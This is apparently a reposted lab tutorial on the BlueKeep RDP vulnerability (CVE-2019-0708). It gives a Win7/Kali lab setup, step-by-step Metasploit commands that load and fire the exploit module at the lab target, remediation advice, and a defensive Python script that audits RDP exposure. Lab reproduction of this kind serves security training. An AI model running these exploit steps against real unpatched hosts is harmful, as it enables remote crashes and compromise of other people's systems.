2025-01-19 Update From: SLTechnology News&Howtos shulou
Shulou(Shulou.com)05/31 Report--
This article walks through CVE-2019-0708 (BlueKeep), the RDP remote code execution vulnerability: the affected versions, the root cause, a lab reproduction, and remediation.
0x00 Vulnerability overview
CVE-2019-0708 is a critical RDP remote code execution vulnerability disclosed by Microsoft on May 14, 2019. It requires neither authentication nor user interaction, so it can lead to a worm outbreak with an impact comparable to that of WannaCry.
On September 07, 2019, @rapid7 publicly released a CVE-2019-0708 exploit module in its metasploit-framework repository. Exploitation tools have begun to spread, making this a worm-level threat.
0x01 Affected versions
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
Users of Windows 8, Windows 10 and later are not affected by this vulnerability.
0x02 Vulnerability principle
The vulnerability is a use-after-free (UAF): an object pointer is used again after the object has been freed. For details, see
https://www.anquanke.com/post/id/181577
0x03 Environment setup
Environment:
Win7 SP1: 192.168.152.139
Kali 2019.4: 192.168.152.138
1. Prepare Win7 SP1:
Open port 3389:
Open Control Panel, select System and Security, select System, and click Remote settings. In the System Properties dialog, click the Remote tab and select "Allow connections from computers running any version of Remote Desktop (less secure)".
2. Press Win + R, enter cmd, and run netstat -ano to view the port status. Port 3389 should be in the LISTENING state.
3. Modify the registry:
Press Win + R and enter regedit to open Registry Editor. Go to the following key, find fDisableCam, and change its value to 0:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\fDisableCam = 0
4. Open Kali:
Download the files needed for the Kali 2019 version.
There are four files with the .rb suffix. Put each one in the corresponding directory (the rdp directory has to be created manually):
rdp.rb -> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
5. Check that the files were copied successfully:
cd /usr/share/metasploit-framework/lib/msf/core/exploit/
cd /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cd /usr/share/metasploit-framework/modules/exploits/windows/rdp/
0x04 Vulnerability reproduction
1. Start msf:
msfconsole
2. Reload all modules (important):
Command: reload_all
3. Search for the vulnerability module:
search 2019_0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce // use the exploit module
set rhosts 192.168.152.139 // set the target host (Win7 SP1)
set rport 3389 // set the target port
set target 3
4. Execute run. The Win7 SP1 target blue-screens.
0x05 Vulnerability remediation
1. Install the security patch for the affected system promptly.
2. Close port 3389, or add a firewall security policy to restrict access to port 3389.
3. If you cannot patch, enable Network Level Authentication (NLA) for Remote Desktop as a temporary mitigation.
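A check for remediation items 2 and 3, added here as an example and not part of the original article: it parses saved `netstat -ano` and `reg query` output and reports an RDP listener bound to all interfaces and NLA not being required. The sample inputs are constructed, and the `UserAuthentication` value under the RDP-Tcp key (1 = NLA required) is an assumption not mentioned in the article.

```python
import re

# Constructed sample: `netstat -ano` output from a lab host (not a real capture).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       716
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1096
  TCP    192.168.152.139:3389   192.168.152.138:51514  ESTABLISHED     1096
  TCP    [::]:3389              [::]:0                 LISTENING       1096
"""

# Constructed sample: `reg query` output for the RDP-Tcp key (two values only).
SAMPLE_REG = """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp
    fDisableCam    REG_DWORD    0x0
    UserAuthentication    REG_DWORD    0x0
"""

WILDCARD = {"0.0.0.0", "[::]"}  # addresses meaning "all interfaces"

def rdp_listeners(netstat_text, port=3389):
    """Return (local_address, pid) for every TCP socket LISTENING on `port`."""
    found = []
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) == 5 and f[0] == "TCP" and f[3] == "LISTENING":
            addr, _, p = f[1].rpartition(":")  # rpartition keeps "[::]" intact
            if p == str(port):
                found.append((addr, int(f[4])))
    return found

def reg_dwords(reg_text):
    """Map value name -> int for each REG_DWORD line in `reg query` output."""
    pat = re.compile(r"^[ \t]+(\S+)[ \t]+REG_DWORD[ \t]+(0x[0-9a-fA-F]+)[ \t]*$", re.M)
    return {name: int(val, 16) for name, val in pat.findall(reg_text)}

def audit(netstat_text, reg_text):
    """Return findings that map to remediation items 2 and 3."""
    findings = []
    listeners = rdp_listeners(netstat_text)
    exposed = sorted({a for a, _ in listeners if a in WILDCARD})
    if exposed:
        findings.append("3389 listening on all interfaces: " + ", ".join(exposed))
    # Assumption: a missing UserAuthentication value is treated as "NLA not required".
    if listeners and reg_dwords(reg_text).get("UserAuthentication", 0) != 1:
        findings.append("NLA not required (UserAuthentication != 1)")
    return findings

if __name__ == "__main__":
    for item in audit(SAMPLE_NETSTAT, SAMPLE_REG):
        print("FINDING:", item)
```

A listener on all interfaces is only a prompt to review the firewall policy in front of the host; the script cannot see whether access to port 3389 is already restricted upstream.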